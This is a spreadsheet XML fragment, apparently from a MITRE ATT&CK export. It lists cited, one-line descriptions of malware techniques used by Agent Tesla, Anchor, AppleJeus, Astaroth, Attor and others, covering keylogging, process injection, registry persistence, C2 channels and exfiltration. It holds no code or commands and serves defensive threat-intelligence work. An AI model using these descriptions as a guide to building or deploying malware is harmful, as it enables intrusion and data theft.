    <t>[Agent Tesla](https://attack.mitre.org/software/S0331) has created hidden folders.(Citation: SentinelLabs Agent Tesla Aug 2020)</t>
  </si>
  <si>
    <t>Hidden Window</t>
  </si>
  <si>
    <t>[Agent Tesla](https://attack.mitre.org/software/S0331) has used &lt;code&gt;ProcessWindowStyle.Hidden&lt;/code&gt; to hide windows.(Citation: Malwarebytes Agent Tesla April 2020)</t>
  </si>
  <si>
    <t>[Agent Tesla](https://attack.mitre.org/software/S0331) can download additional files for execution on the victim’s machine.(Citation: Talos Agent Tesla Oct 2018)(Citation: DigiTrust Agent Tesla Jan 2017)</t>
  </si>
  <si>
    <t>[Agent Tesla](https://attack.mitre.org/software/S0331) can log keystrokes on the victim’s machine.(Citation: Talos Agent Tesla Oct 2018)(Citation: DigiTrust Agent Tesla Jan 2017)(Citation: Fortinet Agent Tesla June 2017)(Citation: Bitdefender Agent Tesla April 2020)(Citation: SentinelLabs Agent Tesla Aug 2020)</t>
  </si>
  <si>
    <t>Local Account</t>
  </si>
  <si>
    <t>[Agent Tesla](https://attack.mitre.org/software/S0331) can collect account information from the victim’s machine.(Citation: DigiTrust Agent Tesla Jan 2017)</t>
  </si>
  <si>
    <t>Mail Protocols</t>
  </si>
  <si>
    <t>[Agent Tesla](https://attack.mitre.org/software/S0331) has used SMTP for C2 communications.(Citation: DigiTrust Agent Tesla Jan 2017)(Citation: Fortinet Agent Tesla June 2017)(Citation: Bitdefender Agent Tesla April 2020)</t>
  </si>
  <si>
    <t>Malicious File</t>
  </si>
  <si>
    <t>[Agent Tesla](https://attack.mitre.org/software/S0331) has been executed through malicious e-mail attachments (Citation: Bitdefender Agent Tesla April 2020)</t>
  </si>
  <si>
    <t>[Agent Tesla](https://attack.mitre.org/software/S0331) has the ability to use form-grabbing to extract data from web data forms.(Citation: Bitdefender Agent Tesla April 2020)</t>
  </si>
  <si>
    <t xml:space="preserve">[Agent Tesla](https://attack.mitre.org/software/S0331) can achieve persistence by modifying Registry key entries.(Citation: SentinelLabs Agent Tesla Aug 2020) </t>
  </si>
  <si>
    <t>[Agent Tesla](https://attack.mitre.org/software/S0331) has had its code obfuscated in an apparent attempt to make analysis difficult.(Citation: Fortinet Agent Tesla April 2018) [Agent Tesla](https://attack.mitre.org/software/S0331) has used the Rijndael symmetric encryption algorithm to encrypt strings.(Citation: Malwarebytes Agent Tesla April 2020)</t>
  </si>
  <si>
    <t>[Agent Tesla](https://attack.mitre.org/software/S0331) can list the current running processes on the system.(Citation: Fortinet Agent Tesla June 2017)</t>
  </si>
  <si>
    <t>Process Hollowing</t>
  </si>
  <si>
    <t xml:space="preserve">[Agent Tesla](https://attack.mitre.org/software/S0331) has used process hollowing to create and manipulate processes through sections of unmapped memory by reallocating that space with its malicious code.(Citation: SentinelLabs Agent Tesla Aug 2020) </t>
  </si>
  <si>
    <t xml:space="preserve">[Agent Tesla](https://attack.mitre.org/software/S0331) can inject into known, vulnerable binaries on targeted hosts.(Citation: SentinelLabs Agent Tesla Aug 2020) </t>
  </si>
  <si>
    <t xml:space="preserve">[Agent Tesla](https://attack.mitre.org/software/S0331) can add itself to the Registry as a startup program to establish persistence.(Citation: Fortinet Agent Tesla April 2018)(Citation: SentinelLabs Agent Tesla Aug 2020) </t>
  </si>
  <si>
    <t>Regsvcs/Regasm</t>
  </si>
  <si>
    <t xml:space="preserve">[Agent Tesla](https://attack.mitre.org/software/S0331) has dropped RegAsm.exe onto systems for performing malicious activity.(Citation: SentinelLabs Agent Tesla Aug 2020) </t>
  </si>
  <si>
    <t>Scheduled Task</t>
  </si>
  <si>
    <t xml:space="preserve">[Agent Tesla](https://attack.mitre.org/software/S0331)  has achieved persistence via scheduled tasks.(Citation: SentinelLabs Agent Tesla Aug 2020) </t>
  </si>
  <si>
    <t>[Agent Tesla](https://attack.mitre.org/software/S0331) can capture screenshots of the victim’s desktop.(Citation: Talos Agent Tesla Oct 2018)(Citation: DigiTrust Agent Tesla Jan 2017)(Citation: Fortinet Agent Tesla April 2018)(Citation: Fortinet Agent Tesla June 2017)(Citation: Bitdefender Agent Tesla April 2020)</t>
  </si>
  <si>
    <t>Spearphishing Attachment</t>
  </si>
  <si>
    <t xml:space="preserve">The primary delivered mechaism for [Agent Tesla](https://attack.mitre.org/software/S0331) is through email phishing messages.(Citation: Bitdefender Agent Tesla April 2020) </t>
  </si>
  <si>
    <t>[Agent Tesla](https://attack.mitre.org/software/S0331) can collect the system's computer name and also has the capability to collect information on the processor, memory, OS, and video card from the system.(Citation: Fortinet Agent Tesla April 2018)(Citation: Fortinet Agent Tesla June 2017)(Citation: Malwarebytes Agent Tesla April 2020)</t>
  </si>
  <si>
    <t xml:space="preserve">[Agent Tesla](https://attack.mitre.org/software/S0331) can collect the IP address of the victim machine and spawn instances of netsh.exe to enumerate wireless settings.(Citation: DigiTrust Agent Tesla Jan 2017)(Citation: SentinelLabs Agent Tesla Aug 2020) </t>
  </si>
  <si>
    <t>[Agent Tesla](https://attack.mitre.org/software/S0331) can collect the username from the victim’s machine.(Citation: DigiTrust Agent Tesla Jan 2017)(Citation: Fortinet Agent Tesla April 2018)(Citation: Malwarebytes Agent Tesla April 2020)</t>
  </si>
  <si>
    <t>[Agent Tesla](https://attack.mitre.org/software/S0331) can collect the timestamp from the victim’s machine.(Citation: DigiTrust Agent Tesla Jan 2017)</t>
  </si>
  <si>
    <t>[Agent Tesla](https://attack.mitre.org/software/S0331) can access the victim’s webcam and record video.(Citation: DigiTrust Agent Tesla Jan 2017)(Citation: Talos Agent Tesla Oct 2018)</t>
  </si>
  <si>
    <t xml:space="preserve"> [Agent Tesla](https://attack.mitre.org/software/S0331) has he ability to perform anti-sandboxing and anti-virtualization checks.(Citation: Malwarebytes Agent Tesla April 2020)</t>
  </si>
  <si>
    <t>[Agent Tesla](https://attack.mitre.org/software/S0331) has used HTTP for C2 communications.(Citation: DigiTrust Agent Tesla Jan 2017)(Citation: Fortinet Agent Tesla June 2017)</t>
  </si>
  <si>
    <t xml:space="preserve">[Agent Tesla](https://attack.mitre.org/software/S0331) has used wmi queries to gather information from the system.(Citation: Bitdefender Agent Tesla April 2020) </t>
  </si>
  <si>
    <t>[Agent.btz](https://attack.mitre.org/software/S0092) saves system information into an XML file that is then XOR-encoded.(Citation: ThreatExpert Agent.btz)</t>
  </si>
  <si>
    <t>Exfiltration over USB</t>
  </si>
  <si>
    <t>[Agent.btz](https://attack.mitre.org/software/S0092) creates a file named thumb.dd on all USB flash drives connected to the victim. This file contains information about the infected system and activity logs.(Citation: Securelist Agent.btz)</t>
  </si>
  <si>
    <t>[Agent.btz](https://attack.mitre.org/software/S0092) attempts to download an encrypted binary from a specified domain.(Citation: ThreatExpert Agent.btz)</t>
  </si>
  <si>
    <t>[Agent.btz](https://attack.mitre.org/software/S0092) drops itself onto removable media devices and creates an autorun.inf file with an instruction to run that file. When the device is inserted into another system, it opens autorun.inf and loads the malware.(Citation: ThreatExpert Agent.btz)</t>
  </si>
  <si>
    <t>[Agent.btz](https://attack.mitre.org/software/S0092) collects the network adapter’s IP and MAC address as well as IP addresses of the network adapter’s default gateway, primary/secondary WINS, DHCP, and DNS servers, and saves them into a log file.(Citation: ThreatExpert Agent.btz)</t>
  </si>
  <si>
    <t>[Agent.btz](https://attack.mitre.org/software/S0092) obtains the victim username and saves it to a file.(Citation: ThreatExpert Agent.btz)</t>
  </si>
  <si>
    <t>Code Signing</t>
  </si>
  <si>
    <t>[Anchor](https://attack.mitre.org/software/S0504) has been signed with valid certificates to evade detection by security tools.(Citation: Cyberreason Anchor December 2019)</t>
  </si>
  <si>
    <t>Cron</t>
  </si>
  <si>
    <t>[Anchor](https://attack.mitre.org/software/S0504) can install itself as a cron job.(Citation: Medium Anchor DNS July 2020)</t>
  </si>
  <si>
    <t>DNS</t>
  </si>
  <si>
    <t>Variants of [Anchor](https://attack.mitre.org/software/S0504) can use DNS tunneling to communicate with C2.(Citation: Cyberreason Anchor December 2019)(Citation: Medium Anchor DNS July 2020)</t>
  </si>
  <si>
    <t>[Anchor](https://attack.mitre.org/software/S0504) can terminate itself if specific execution flags are not present.(Citation: Cyberreason Anchor December 2019)</t>
  </si>
  <si>
    <t>[Anchor](https://attack.mitre.org/software/S0504) can use secondary C2 servers for communication after establishing connectivity and relaying victim information to primary C2 servers.(Citation: Cyberreason Anchor December 2019)</t>
  </si>
  <si>
    <t>[Anchor](https://attack.mitre.org/software/S0504) can self delete its dropper after the malware is successfully deployed.(Citation: Cyberreason Anchor December 2019)</t>
  </si>
  <si>
    <t>[Anchor](https://attack.mitre.org/software/S0504) can download additional payloads.(Citation: Cyberreason Anchor December 2019)(Citation: Medium Anchor DNS July 2020)</t>
  </si>
  <si>
    <t>NTFS File Attributes</t>
  </si>
  <si>
    <t>[Anchor](https://attack.mitre.org/software/S0504) has used NTFS to hide files.(Citation: Cyberreason Anchor December 2019)</t>
  </si>
  <si>
    <t>[Anchor](https://attack.mitre.org/software/S0504) has used ICMP in C2 communications.(Citation: Cyberreason Anchor December 2019)</t>
  </si>
  <si>
    <t>[Anchor](https://attack.mitre.org/software/S0504) has obsuscated code with stack strings and string encryption.(Citation: Cyberreason Anchor December 2019)</t>
  </si>
  <si>
    <t>SMB/Windows Admin Shares</t>
  </si>
  <si>
    <t>[Anchor](https://attack.mitre.org/software/S0504) can support windows execution via SMB shares.(Citation: Medium Anchor DNS July 2020)</t>
  </si>
  <si>
    <t>[Anchor](https://attack.mitre.org/software/S0504) can create a scheduled task for persistence.(Citation: Cyberreason Anchor December 2019)</t>
  </si>
  <si>
    <t>Service Execution</t>
  </si>
  <si>
    <t>[Anchor](https://attack.mitre.org/software/S0504) can create and execute services to load its payload.(Citation: Cyberreason Anchor December 2019)(Citation: Medium Anchor DNS July 2020)</t>
  </si>
  <si>
    <t>Software Packing</t>
  </si>
  <si>
    <t>[Anchor](https://attack.mitre.org/software/S0504) has come with a packed payload.(Citation: Cyberreason Anchor December 2019)</t>
  </si>
  <si>
    <t>[Anchor](https://attack.mitre.org/software/S0504) can determine the hostname and linux version on a compromised host.(Citation: Medium Anchor DNS July 2020)</t>
  </si>
  <si>
    <t>[Anchor](https://attack.mitre.org/software/S0504) can determine the public IP and location of a compromised host.(Citation: Medium Anchor DNS July 2020)</t>
  </si>
  <si>
    <t>Unix Shell</t>
  </si>
  <si>
    <t>[Anchor](https://attack.mitre.org/software/S0504) can execute payloads via shell scripting.(Citation: Medium Anchor DNS July 2020)</t>
  </si>
  <si>
    <t>[Anchor](https://attack.mitre.org/software/S0504) has used HTTP and HTTPS in C2 communications.(Citation: Cyberreason Anchor December 2019)</t>
  </si>
  <si>
    <t>[Anchor](https://attack.mitre.org/software/S0504) has used cmd.exe to run its self deletion routine.(Citation: Cyberreason Anchor December 2019)</t>
  </si>
  <si>
    <t>Windows Service</t>
  </si>
  <si>
    <t>[Anchor](https://attack.mitre.org/software/S0504) can establish persistence by creating a service.(Citation: Cyberreason Anchor December 2019)</t>
  </si>
  <si>
    <t>Bypass User Account Control</t>
  </si>
  <si>
    <t>[AppleJeus](https://attack.mitre.org/software/S0584) has presented the user with a UAC prompt to elevate privileges while installing.(Citation: CISA AppleJeus Feb 2021)</t>
  </si>
  <si>
    <t xml:space="preserve">[AppleJeus](https://attack.mitre.org/software/S0584) has used a valid digital signature from Sectigo to appear legitimate.(Citation: CISA AppleJeus Feb 2021) </t>
  </si>
  <si>
    <t>[AppleJeus](https://attack.mitre.org/software/S0584) has decoded files received from a C2.(Citation: CISA AppleJeus Feb 2021)</t>
  </si>
  <si>
    <t>[AppleJeus](https://attack.mitre.org/software/S0584) has exfiltrated collected host information to a C2 server.(Citation: CISA AppleJeus Feb 2021)</t>
  </si>
  <si>
    <t>[AppleJeus](https://attack.mitre.org/software/S0584) has deleted the MSI file after installation.(Citation: CISA AppleJeus Feb 2021)</t>
  </si>
  <si>
    <t>[AppleJeus](https://attack.mitre.org/software/S0584) has added a leading &lt;code&gt;.&lt;/code&gt; to plist filenames, unlisting them from the Finder app and default Terminal directory listings.(Citation: CISA AppleJeus Feb 2021)</t>
  </si>
  <si>
    <t>Launch Daemon</t>
  </si>
  <si>
    <t>[AppleJeus](https://attack.mitre.org/software/S0584) has placed a plist file within the &lt;code&gt;LaunchDaemons&lt;/code&gt; folder and launched it manually.(Citation: CISA AppleJeus Feb 2021)</t>
  </si>
  <si>
    <t>Launchctl</t>
  </si>
  <si>
    <t>[AppleJeus](https://attack.mitre.org/software/S0584) has loaded a plist file using the &lt;code&gt;launchctl&lt;/code&gt; command.(Citation: CISA AppleJeus Feb 2021)</t>
  </si>
  <si>
    <t>[AppleJeus](https://attack.mitre.org/software/S0584) has required user execution of a malicious MSI installer.(Citation: CISA AppleJeus Feb 2021)</t>
  </si>
  <si>
    <t>Malicious Link</t>
  </si>
  <si>
    <t>[AppleJeus](https://attack.mitre.org/software/S0584)'s spearphishing links required user interaction to navigate to the malicious website.(Citation: CISA AppleJeus Feb 2021)</t>
  </si>
  <si>
    <t>Msiexec</t>
  </si>
  <si>
    <t>[AppleJeus](https://attack.mitre.org/software/S0584) has been installed via MSI installer.(Citation: CISA AppleJeus Feb 2021)</t>
  </si>
  <si>
    <t>[AppleJeus](https://attack.mitre.org/software/S0584) has XOR-encrypted collected system information prior to sending to a C2. [AppleJeus](https://attack.mitre.org/software/S0584) has also used the open source ADVObfuscation library for its components.(Citation: CISA AppleJeus Feb 2021)</t>
  </si>
  <si>
    <t>[AppleJeus](https://attack.mitre.org/software/S0584) has created a scheduled SYSTEM task that runs when a user logs in.(Citation: CISA AppleJeus Feb 2021)</t>
  </si>
  <si>
    <t>Spearphishing Link</t>
  </si>
  <si>
    <t>[AppleJeus](https://attack.mitre.org/software/S0584) has been distributed via spearphishing link.(Citation: CISA AppleJeus Feb 2021)</t>
  </si>
  <si>
    <t>[AppleJeus](https://attack.mitre.org/software/S0584) has collected the victim host information after infection.(Citation: CISA AppleJeus Feb 2021)</t>
  </si>
  <si>
    <t>Time Based Evasion</t>
  </si>
  <si>
    <t>[AppleJeus](https://attack.mitre.org/software/S0584) has waited a specified time before downloading a second stage payload.(Citation: CISA AppleJeus Feb 2021)</t>
  </si>
  <si>
    <t>[AppleJeus](https://attack.mitre.org/software/S0584) has used shell scripts to execute commands after installation and set persistence mechanisms.(Citation: CISA AppleJeus Feb 2021)</t>
  </si>
  <si>
    <t>[AppleJeus](https://attack.mitre.org/software/S0584) has sent data to its C2 server via &lt;code&gt;POST&lt;/code&gt; requests.(Citation: CISA AppleJeus Feb 2021)</t>
  </si>
  <si>
    <t xml:space="preserve">[AppleJeus](https://attack.mitre.org/software/S0584) can install itself as a service.(Citation: CISA AppleJeus Feb 2021) </t>
  </si>
  <si>
    <t>[Aria-body](https://attack.mitre.org/software/S0456) has the ability to identify the titles of running windows on a compromised host.(Citation: CheckPoint Naikon May 2020)</t>
  </si>
  <si>
    <t>[Aria-body](https://attack.mitre.org/software/S0456) has used ZIP to compress data gathered on a compromised host.(Citation: CheckPoint Naikon May 2020)</t>
  </si>
  <si>
    <t>Create Process with Token</t>
  </si>
  <si>
    <t>[Aria-body](https://attack.mitre.org/software/S0456) has the ability to execute a process using &lt;code&gt;runas&lt;/code&gt;.(Citation: CheckPoint Naikon May 2020)</t>
  </si>
  <si>
    <t>[Aria-body](https://attack.mitre.org/software/S0456) has the ability to collect data from USB devices.(Citation: CheckPoint Naikon May 2020)</t>
  </si>
  <si>
    <t>[Aria-body](https://attack.mitre.org/software/S0456) has the ability to decrypt the loader configuration and payload DLL.(Citation: CheckPoint Naikon May 2020)</t>
  </si>
  <si>
    <t>Domain Generation Algorithms</t>
  </si>
  <si>
    <t>[Aria-body](https://attack.mitre.org/software/S0456) has the ability to use a DGA for C2 communications.(Citation: CheckPoint Naikon May 2020)</t>
  </si>
  <si>
    <t>Dynamic-link Library Injection</t>
  </si>
  <si>
    <t>[Aria-body](https://attack.mitre.org/software/S0456) has the ability to inject itself into another process such as rundll32.exe and dllhost.exe.(Citation: CheckPoint Naikon May 2020)</t>
  </si>
  <si>
    <t>[Aria-body](https://attack.mitre.org/software/S0456) has the ability to delete files and directories on compromised hosts.(Citation: CheckPoint Naikon May 2020)</t>
  </si>
  <si>
    <t>[Aria-body](https://attack.mitre.org/software/S0456) has the ability to gather metadata from a file and to search for file and directory names.(Citation: CheckPoint Naikon May 2020)</t>
  </si>
  <si>
    <t>[Aria-body](https://attack.mitre.org/software/S0456) has the ability to download additional payloads from C2.(Citation: CheckPoint Naikon May 2020)</t>
  </si>
  <si>
    <t>[Aria-body](https://attack.mitre.org/software/S0456) has the ability to launch files using &lt;code&gt;ShellExecute&lt;/code&gt;.(Citation: CheckPoint Naikon May 2020)</t>
  </si>
  <si>
    <t>[Aria-body](https://attack.mitre.org/software/S0456) has used TCP in C2 communications.(Citation: CheckPoint Naikon May 2020)</t>
  </si>
  <si>
    <t>[Aria-body](https://attack.mitre.org/software/S0456) has used an encrypted configuration file for its loader.(Citation: CheckPoint Naikon May 2020)</t>
  </si>
  <si>
    <t>[Aria-body](https://attack.mitre.org/software/S0456) has the ability to enumerate loaded modules for a process.(Citation: CheckPoint Naikon May 2020).</t>
  </si>
  <si>
    <t>[Aria-body](https://attack.mitre.org/software/S0456) has the ability to use a reverse SOCKS proxy module.(Citation: CheckPoint Naikon May 2020)</t>
  </si>
  <si>
    <t>[Aria-body](https://attack.mitre.org/software/S0456) has established persistence via the Startup folder or Run Registry key.(Citation: CheckPoint Naikon May 2020)</t>
  </si>
  <si>
    <t>[Aria-body](https://attack.mitre.org/software/S0456) has the ability to capture screenshots on compromised hosts.(Citation: CheckPoint Naikon May 2020)</t>
  </si>
  <si>
    <t>[Aria-body](https://attack.mitre.org/software/S0456) has the ability to identify the hostname, computer name, Windows version, processor speed, machine GUID, and disk information on a compromised host.(Citation: CheckPoint Naikon May 2020)</t>
  </si>
  <si>
    <t>[Aria-body](https://attack.mitre.org/software/S0456) has the ability to identify the location, public IP address, and domain name on a compromised host.(Citation: CheckPoint Naikon May 2020)</t>
  </si>
  <si>
    <t>[Aria-body](https://attack.mitre.org/software/S0456) has the ability to gather TCP and UDP table status listings.(Citation: CheckPoint Naikon May 2020)</t>
  </si>
  <si>
    <t>[Aria-body](https://attack.mitre.org/software/S0456) has the ability to identify the username on a compromised host.(Citation: CheckPoint Naikon May 2020)</t>
  </si>
  <si>
    <t>Token Impersonation/Theft</t>
  </si>
  <si>
    <t>[Aria-body](https://attack.mitre.org/software/S0456) has the ability to duplicate a token from ntprint.exe.(Citation: CheckPoint Naikon May 2020)</t>
  </si>
  <si>
    <t>[Aria-body](https://attack.mitre.org/software/S0456) has used HTTP in C2 communications.(Citation: CheckPoint Naikon May 2020)</t>
  </si>
  <si>
    <t>[Arp](https://attack.mitre.org/software/S0099) can be used to display ARP configuration information on the host.</t>
  </si>
  <si>
    <t>[Astaroth](https://attack.mitre.org/software/S0373) collects information from the clipboard by using the OpenClipboard() and GetClipboardData() libraries. (Citation: Cybereason Astaroth Feb 2019)</t>
  </si>
  <si>
    <t>Compiled HTML File</t>
  </si>
  <si>
    <t>[Astaroth](https://attack.mitre.org/software/S0373) uses ActiveX objects for file execution and manipulation. (Citation: Cofense Astaroth Sept 2018)</t>
  </si>
  <si>
    <t>[Astaroth](https://attack.mitre.org/software/S0373) uses an external software known as NetPass to recover passwords. (Citation: Cybereason Astaroth Feb 2019)</t>
  </si>
  <si>
    <t>DLL Search Order Hijacking</t>
  </si>
  <si>
    <t>[Astaroth](https://attack.mitre.org/software/S0373) can launch itself via DLL Search Order Hijacking.(Citation: Securelist Brazilian Banking Malware July 2020)</t>
  </si>
  <si>
    <t>Dead Drop Resolver</t>
  </si>
  <si>
    <t>[Astaroth](https://attack.mitre.org/software/S0373) can store C2 information on cloud hosting services such as AWS and CloudFlare and websites like YouTube and Facebook.(Citation: Securelist Brazilian Banking Malware July 2020)</t>
  </si>
  <si>
    <t>[Astaroth](https://attack.mitre.org/software/S0373) uses a fromCharCode() deobfuscation method to avoid explicitly writing execution commands and to hide its code. (Citation: Cybereason Astaroth Feb 2019)(Citation: Securelist Brazilian Banking Malware July 2020)</t>
  </si>
  <si>
    <t>[Astaroth](https://attack.mitre.org/software/S0373) has used a DGA in C2 communications.(Citation: Cybereason Astaroth Feb 2019)</t>
  </si>
  <si>
    <t>[Astaroth](https://attack.mitre.org/software/S0373) exfiltrates collected information from its r1.log file to the external C2 server. (Citation: Cybereason Astaroth Feb 2019)</t>
  </si>
  <si>
    <t>[Astaroth](https://attack.mitre.org/software/S0373) loads its module with the XSL script parameter &lt;code&gt;vShow&lt;/code&gt; set to zero, which opens the application with a hidden window. (Citation: Cybereason Astaroth Feb 2019)</t>
  </si>
  <si>
    <t>[Astaroth](https://attack.mitre.org/software/S0373) uses [certutil](https://attack.mitre.org/software/S0160) and [BITSAdmin](https://attack.mitre.org/software/S0190) to download additional malware. (Citation: Cofense Astaroth Sept 2018)(Citation: Cybereason Astaroth Feb 2019)(Citation: Securelist Brazilian Banking Malware July 2020)</t>
  </si>
  <si>
    <t>JavaScript</t>
  </si>
  <si>
    <t>[Astaroth](https://attack.mitre.org/software/S0373) uses JavaScript to perform its core functionalities. (Citation: Cofense Astaroth Sept 2018)(Citation: Securelist Brazilian Banking Malware July 2020)</t>
  </si>
  <si>
    <t>[Astaroth](https://attack.mitre.org/software/S0373) logs keystrokes from the victim's machine. (Citation: Cofense Astaroth Sept 2018)</t>
  </si>
  <si>
    <t>[Astaroth](https://attack.mitre.org/software/S0373) collects data in a plaintext file named r1.log before exfiltration. (Citation: Cofense Astaroth Sept 2018)</t>
  </si>
  <si>
    <t>[Astaroth](https://attack.mitre.org/software/S0373) has used malicious files including VBS, LNK, and HTML for execution.(Citation: Securelist Brazilian Banking Malware July 2020)</t>
  </si>
  <si>
    <t>[Astaroth](https://attack.mitre.org/software/S0373) can abuse alternate data streams (ADS) to store content for malicious payloads.(Citation: Securelist Brazilian Banking Malware July 2020)</t>
  </si>
  <si>
    <t>[Astaroth](https://attack.mitre.org/software/S0373) obfuscates its JScript code, and has used an XOR-based algorithm to encrypt payloads twice with different keys.(Citation: Cybereason Astaroth Feb 2019)(Citation: Securelist Brazilian Banking Malware July 2020)</t>
  </si>
  <si>
    <t>[Astaroth](https://attack.mitre.org/software/S0373) searches for different processes on the system.(Citation: Cybereason Astaroth Feb 2019)</t>
  </si>
  <si>
    <t>[Astaroth](https://attack.mitre.org/software/S0373) can create a new process in a suspended state from a targeted legitimate process in order to unmap its memory and replace it with malicious code.(Citation: Cybereason Astaroth Feb 2019)(Citation: Securelist Brazilian Banking Malware July 2020)</t>
  </si>
  <si>
    <t>[Astaroth](https://attack.mitre.org/software/S0373) creates a startup item for persistence. (Citation: Cofense Astaroth Sept 2018)</t>
  </si>
  <si>
    <t>Regsvr32</t>
  </si>
  <si>
    <t>[Astaroth](https://attack.mitre.org/software/S0373) can be loaded through regsvr32.exe.(Citation: Cybereason Astaroth Feb 2019)</t>
  </si>
  <si>
    <t>[Astaroth](https://attack.mitre.org/software/S0373) checks for the presence of Avast antivirus in the &lt;code&gt;C:\Program\Files\&lt;/code&gt; folder. (Citation: Cofense Astaroth Sept 2018)</t>
  </si>
  <si>
    <t>[Astaroth](https://attack.mitre.org/software/S0373) uses the LoadLibraryExW() function to load additional modules. (Citation: Cybereason Astaroth Feb 2019)</t>
  </si>
  <si>
    <t>Shortcut Modification</t>
  </si>
  <si>
    <t>[Astaroth](https://attack.mitre.org/software/S0373)'s initial payload is a malicious .LNK file. (Citation: Cofense Astaroth Sept 2018)(Citation: Cybereason Astaroth Feb 2019)</t>
  </si>
  <si>
    <t>[Astaroth](https://attack.mitre.org/software/S0373) uses a software packer called Pe123\RPolyCryptor.(Citation: Cybereason Astaroth Feb 2019)</t>
  </si>
  <si>
    <t>[Astaroth](https://attack.mitre.org/software/S0373) has been delivered via malicious e-mail attachments.(Citation: Securelist Brazilian Banking Malware July 2020)</t>
  </si>
  <si>
    <t>[Astaroth](https://attack.mitre.org/software/S0373) encodes data using Base64 before sending it to the C2 server. (Citation: Cofense Astaroth Sept 2018)</t>
  </si>
  <si>
    <t>System Checks</t>
  </si>
  <si>
    <t>[Astaroth](https://attack.mitre.org/software/S0373) can check for Windows product ID's used by sandboxes and usernames and disk serial numbers associated with analyst environments.(Citation: Securelist Brazilian Banking Malware July 2020)</t>
  </si>
  <si>
    <t>[Astaroth](https://attack.mitre.org/software/S0373) collects the machine name and keyboard language from the system. (Citation: Cofense Astaroth Sept 2018)(Citation: Cybereason Astaroth Feb 2019)</t>
  </si>
  <si>
    <t>[Astaroth](https://attack.mitre.org/software/S0373) collects the external IP address from the system. (Citation: Cofense Astaroth Sept 2018)</t>
  </si>
  <si>
    <t>[Astaroth](https://attack.mitre.org/software/S0373) collects the timestamp from the infected machine. (Citation: Cofense Astaroth Sept 2018)</t>
  </si>
  <si>
    <t>Visual Basic</t>
  </si>
  <si>
    <t>[Astaroth](https://attack.mitre.org/software/S0373) has used malicious VBS e-mail attachments for execution.(Citation: Securelist Brazilian Banking Malware July 2020)</t>
  </si>
  <si>
    <t>[Astaroth](https://attack.mitre.org/software/S0373) spawns a CMD process to execute commands. (Citation: Cybereason Astaroth Feb 2019)</t>
  </si>
  <si>
    <t>[Astaroth](https://attack.mitre.org/software/S0373) uses WMIC to execute payloads. (Citation: Cofense Astaroth Sept 2018)</t>
  </si>
  <si>
    <t>[Astaroth](https://attack.mitre.org/software/S0373) executes embedded JScript or VBScript in an XSL stylesheet located on a remote domain. (Citation: Cybereason Astaroth Feb 2019)</t>
  </si>
  <si>
    <t>[Attor](https://attack.mitre.org/software/S0438) can obtain application window titles and then determines which windows to perform Screen Capture on.(Citation: ESET Attor Oct 2019)</t>
  </si>
  <si>
    <t>[Attor](https://attack.mitre.org/software/S0438) encrypts collected data with a custom implementation of Blowfish and RSA ciphers.(Citation: ESET Attor Oct 2019)</t>
  </si>
  <si>
    <t>[Attor](https://attack.mitre.org/software/S0438)'s Blowfish key is encrypted with a public RSA key.(Citation: ESET Attor Oct 2019)</t>
  </si>
  <si>
    <t>Asynchronous Procedure Call</t>
  </si>
  <si>
    <t>[Attor](https://attack.mitre.org/software/S0438) performs the injection by attaching its code into the APC queue using NtQueueApcThread API.(Citation: ESET Attor Oct 2019)</t>
  </si>
  <si>
    <t>[Attor](https://attack.mitre.org/software/S0438)'s has a plugin that is capable of recording audio using available input sound devices.(Citation: ESET Attor Oct 2019)</t>
  </si>
  <si>
    <t>[Attor](https://attack.mitre.org/software/S0438) has automatically collected data about the compromised system.(Citation: ESET Attor Oct 2019)</t>
  </si>
  <si>
    <t>[Attor](https://attack.mitre.org/software/S0438) has a file uploader plugin that automatically exfiltrates the collected data and log files to the C2 server.(Citation: ESET Attor Oct 2019)</t>
  </si>
  <si>
    <t>[Attor](https://attack.mitre.org/software/S0438) has a plugin that collects data stored in the Windows clipboard by using the OpenClipboard and GetClipboardData APIs.(Citation: ESET Attor Oct 2019)</t>
  </si>
  <si>
    <t>[Attor](https://attack.mitre.org/software/S0438) has exfiltrated data over the C2 channel.(Citation: ESET Attor Oct 2019)</t>
  </si>
  <si>
    <t>[Attor](https://attack.mitre.org/software/S0438)’s plugin deletes the collected files and log files after exfiltration.(Citation: ESET Attor Oct 2019)</t>
  </si>
  <si>
    <t>File Transfer Protocols</t>
  </si>
  <si>
    <t>[Attor](https://attack.mitre.org/software/S0438) has used FTP protocol for C2 communication.(Citation: ESET Attor Oct 2019)</t>
  </si>
  <si>
    <t>[Attor](https://attack.mitre.org/software/S0438) has a plugin that enumerates files with specific extensions on all hard disk drives and stores file information in encrypted log files.(Citation: ESET Attor Oct 2019)</t>
  </si>
  <si>
    <t>[Attor](https://attack.mitre.org/software/S0438) can set attributes of log files and directories to HIDDEN, SYSTEM, ARCHIVE, or a combination of those.(Citation: ESET Attor Oct 2019)</t>
  </si>
  <si>
    <t>[Attor](https://attack.mitre.org/software/S0438) can download additional plugins, updates and other files. (Citation: ESET Attor Oct 2019)</t>
  </si>
  <si>
    <t>One of [Attor](https://attack.mitre.org/software/S0438)'s plugins can collect user credentials via capturing keystrokes and can capture keystrokes pressed within the window of the injected process.(Citation: ESET Attor Oct 2019)</t>
  </si>
  <si>
    <t>[Attor](https://attack.mitre.org/software/S0438) has staged collected data in a central upload directory prior to exfiltration.(Citation: ESET Attor Oct 2019)</t>
  </si>
  <si>
    <t>Logon Script (Windows)</t>
  </si>
  <si>
    <t>[Attor](https://attack.mitre.org/software/S0438)'s dispatcher can establish persistence via adding a Registry key with a logon script &lt;code&gt;HKEY_CURRENT_USER\Environment "UserInitMprLogonScript" &lt;/code&gt;.(Citation: ESET Attor Oct 2019)</t>
  </si>
  <si>
    <t>Masquerade Task or Service</t>
  </si>
  <si>
    <t>[Attor](https://attack.mitre.org/software/S0438)'s dispatcher disguises itself as a legitimate task (i.e., the task name and description appear legitimate).(Citation: ESET Attor Oct 2019)</t>
  </si>
  <si>
    <t>[Attor](https://attack.mitre.org/software/S0438)'s dispatcher can modify the Run registry key.(Citation: ESET Attor Oct 2019)</t>
  </si>
  <si>
    <t>Multi-hop Proxy</t>
  </si>
  <si>
    <t>[Attor](https://attack.mitre.org/software/S0438) has used Tor for C2 communication.(Citation: ESET Attor Oct 2019)</t>
  </si>
  <si>
    <t>[Attor](https://attack.mitre.org/software/S0438)'s dispatcher has used CreateProcessW API for execution.(Citation: ESET Attor Oct 2019)</t>
  </si>
  <si>
    <t>Strings in [Attor](https://attack.mitre.org/software/S0438)'s components are encrypted with a XOR cipher, using a hardcoded key and the configuration data, log files and plugins are encrypted using a hybrid encryption scheme of Blowfish-OFB combined with RSA.(Citation: ESET Attor Oct 2019)</t>
